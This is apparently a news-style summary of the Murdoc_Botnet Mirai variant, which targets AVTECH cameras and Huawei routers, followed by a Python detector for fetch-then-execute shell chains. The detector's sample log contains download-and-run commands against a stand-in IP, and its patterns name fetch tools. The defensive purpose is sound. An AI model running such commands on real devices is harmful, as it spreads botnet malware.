
Security researchers have identified a new large-scale cybersecurity threat dubbed “Murdoc_Botnet,” a Mirai variant targeting AVTECH IP cameras and Huawei HG532 routers. The campaign, active since July 2024, has already infected over 1,370 systems, primarily affecting devices in Malaysia, Mexico, Thailand, Indonesia, and Vietnam.
The botnet exploits known vulnerabilities, including CVE-2017-17215 and CVE-2024-7029, to compromise IoT devices. Once a device is compromised, the malware is deployed through a shell script that downloads architecture-specific payloads, ultimately weaponizing the infected device for DDoS attacks.
This development follows other recent Mirai variants, such as “gayfemboy,” which targeted Four-Faith industrial routers. A separate large-scale DDoS campaign has also emerged, targeting Japanese corporations and banks, with additional targets in the U.S., Bahrain, Poland, Spain, Israel, and Russia.
The attack pattern predominantly affects telecommunications, technology, hosting, cloud computing, banking, gaming, and financial services sectors. India leads in compromised devices at 55%, followed by South Africa, Brazil, Bangladesh, and Kenya.
Security Recommendations:
– Monitor suspicious processes and network traffic
– Apply regular firmware updates
– Change default device credentials
– Implement robust network monitoring
The botnet’s enhanced capabilities and widespread impact highlight the growing sophistication of IoT-targeted cyber threats.
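As an added example (not from the original report), the sketch below applies the process-monitoring recommendation to the deployment pattern described above: a shell chain that fetches from a raw IP address, marks a file executable, runs it, and pulls builds for several CPU architectures. The log format, indicator names, architecture-suffix list, hosts, addresses (documentation range) and filenames are all constructed assumptions.

```python
import re

# Heuristic indicators of a fetch-then-execute chain (assumed, not from the report).
FETCH = re.compile(r"\b(?:wget|curl|tftp|ftpget)\b")
RAW_IP = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")
MAKE_EXEC = re.compile(r"\bchmod\s+(?:\+x|[0-7]*7[0-7]{2})\b")
EXEC_STEP = re.compile(r"^(?:(?:ba)?sh(?:\s|$)|\./\S|(?:/tmp|/var/run|/dev/shm)/\S)")
ARCH = re.compile(r"[./_-](arm[4-7]?l?|mips(?:el)?|mpsl|x86(?:_64)?|ppc|sh4|m68k|spc)\b", re.I)

# Constructed sample: "<timestamp> <host> exec: <command line>"
SAMPLE_LOG = """\
2024-08-01T10:00:01Z cam-lobby exec: cd /tmp; wget http://192.0.2.10/fetch.sh; chmod 777 fetch.sh; sh fetch.sh
2024-08-01T10:00:05Z cam-lobby exec: wget http://192.0.2.10/bin.arm7 -O /tmp/a; chmod +x /tmp/a; /tmp/a; wget http://192.0.2.10/bin.mips -O /tmp/b; chmod +x /tmp/b; /tmp/b
2024-08-01T10:03:00Z rtr-edge exec: sh /etc/init.d/network restart
2024-08-01T10:04:00Z nvr-01 exec: wget https://updates.example.com/firmware-2.1.bin -O /tmp/fw.bin
"""

def analyze(cmdline):
    """Return the list of indicator names that fire for one command line."""
    steps = [s.strip() for s in re.split(r"\|\||&&|[;|]", cmdline) if s.strip()]
    reasons = []
    if any(FETCH.search(s) and RAW_IP.search(s) for s in steps):
        reasons.append("fetch-from-raw-ip")
    if any(MAKE_EXEC.search(s) for s in steps):
        reasons.append("chmod-executable")
    if any(EXEC_STEP.match(s) for s in steps):
        reasons.append("exec-from-temp-or-shell")
    # Two or more distinct architecture suffixes suggest per-architecture payloads.
    if len({a.lower() for a in ARCH.findall(cmdline)}) >= 2:
        reasons.append("multi-arch-payloads")
    return reasons

def flag_events(log_text):
    """Flag lines where a raw-IP fetch is combined with at least one other indicator."""
    hits = []
    for line in log_text.splitlines():
        head, sep, cmd = line.partition(" exec: ")
        if not sep:
            continue
        reasons = analyze(cmd)
        if "fetch-from-raw-ip" in reasons and len(reasons) >= 2:
            hits.append((head.split()[-1], reasons))
    return hits

if __name__ == "__main__":
    for host, reasons in flag_events(SAMPLE_LOG):
        print(host, ", ".join(reasons))
```

Requiring a raw-IP fetch plus a second indicator keeps routine commands, such as an init script restart or a firmware download from a named host, out of the results.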